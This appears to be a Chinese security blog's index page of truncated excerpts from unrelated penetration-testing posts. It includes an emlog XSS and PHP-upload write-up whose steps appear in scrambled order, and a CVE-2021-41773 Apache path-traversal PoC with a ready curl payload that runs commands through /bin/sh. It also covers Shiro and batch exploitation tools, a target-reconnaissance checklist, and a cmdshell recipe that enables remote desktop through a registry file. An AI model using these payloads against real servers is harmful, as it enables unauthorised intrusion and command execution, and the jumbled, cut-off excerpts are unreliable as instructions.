白昼小丑的博客

打开审查元素，把输入用户名这个标签的value值改为admin。友情链接处 链接图片可以选择 php上传。后台登录，有个修改密码。输入密码，修改成功。

漏洞危害:攻击利用难度大，且危害后果未实现权限跨越（如：取得数据库或服务器主机权限）！测试版本: 官网下载的最新版本:emlog Pro 1.8.0。漏洞修复:关闭用户注册，文章标签处进行代码过滤。成功进行了弹窗，现在进管理账号看一下。写文章 标签处插入xss测试代码。成功利用管理身份触发xss漏洞。利用条件: 需要开启用户注册。而且会自动保存到标签里。

CVE-2021-41773_CVE-2021-42013CVE-2021-41773 CVE-2021-42013多线程漏洞批量检测与利用工具简介本工具只可用于安全测试，勿用于非法用途！工具定位CVE-2021-41773 CVE-2021-42013多线程漏洞批量检测与利用工具工具截图提交反馈如有好的建议，以及发现BUG。GitHub issue:https://github.com/inbug-team/CVE-2021-41773_CVE-2021-..

在这篇博文中，我将分享对 Dedecms（或翻译成英文的“Chasing a Dream”CMS）的技术评论，包括它的攻击面以及它与其他应用程序的不同之处。最后，我将结束一个影响v5.8.1 预发布的预认证远程代码执行漏洞。这是一款有趣的软件，因为它自最初发布以来已有 14 年的历史，而且 PHP 多年来发生了很大变化。对于网上搜索“什么是中国最大的CMS”很快发现，多源的状态是DEDECMS是最流行的。然而，这些来源几乎都有一个共同点：它们都是旧的。所以，我决定做一个粗略的搜索：该产品..

CVE-2021-41773poc： /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd但是近期国外的师傅研究出了直接RCE的方法，Payload如下：curl --data "A=|id>/tmp/x" 'URL/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv如果想要进行RCE的话就要开启CGI。...

ShiroExploitShiro 可视化利用工具（beta免责声明该项目仅供合法的渗透测试以及爱好者参考学习，请各位遵守《中华人民共和国网络安全法》以及相应地方的法律，禁止使用该项目进行违法操作，否则自行承担相关责任目前已实现：支持密钥爆破以及 CBC/GCM 两种加密模式 可修改特征头，可进行 GET/POST 发包，可选择对应的 Content-Type 支持检测利用链是否可用（Tomcat） 支持命令执行回显（Tomcat） 支持多版本 jar ，目前依赖中 Comm..

WS-AttackerWS-Attacker is a modular framework for web services penetration testing. It is developed by the Chair of Network and Data Securitydependentbuild fromhttps://github.com/RUB-NDS/WS-Attackerbuildcd $HOME/.m2/repository/it/cnr/imaa/ess...

什么是洋葱扫描？OnionScan 是一个免费的开源工具，用于调查暗网。对于匿名和隐私领域的所有惊人技术创新，始终存在一个没有有效技术补丁的持续威胁——人为错误。无论是操作安全漏洞还是软件配置错误——大多数情况下，匿名攻击不是来自破坏底层系统，而是来自我们自己。OnionScan 有两个主要目标： 我们希望帮助隐藏服务的运营商发现并修复其服务的运营安全问题。我们希望帮助他们检测错误配置，我们希望激发新一代匿名工程项目，帮助让世界变得更加私密。 其次，我们希望帮助研究人员和调.

https://github.com/mavillon1/CVE-2021-33739-POC

1、拿到一个待检测的站或给你一个网站，你觉得应该先做什么？一、信息收集1.获取域名的whois信息,获取注册者邮箱姓名电话等。2.通过站长之家、明小子、k8等查询服务器旁站以及子域名站点，因为主站一般比较难，所以先看看旁站有没有通用性的cms或者其他漏洞。3、通过DNS域传送漏洞、备份号查询、SSl证书、APP、微信公众号、暴力破解、DNS历史记录、K8C段查询、Jsfinder、360或华为威胁情报、证书序列号获取企业域名与ip。4.通过Nmap、Wappalyzer、御剑等查看服务器操作...

当外网3389不能登录时候 也可以考虑用lcx转发 不只是内外才可以转发 外网也可以的就遇到过外网服务器开了3389连接不上去 lcx转发下就连接上去了解决远程桌面无法连接的问题-总结的精华 2011-11-25 22:33:23标签：网络管理 Windows 远程控制 休闲 远程桌面连接原创作品，允许转载，转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://zhaogao.blog.51cto.com/205189/724690 ...

开33892003cmdshell下开启远程桌面服务，用"echo"命令写入一个 3389.reg文件，再"regedit /s 3389.reg"导入注册表文件即可开启。将如下代码一行一行地复制到shell终端后按回车执行： echo Windows Registry Editor Version 5.00 >3389.reg　　echo. >>3389.reg　　echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Co...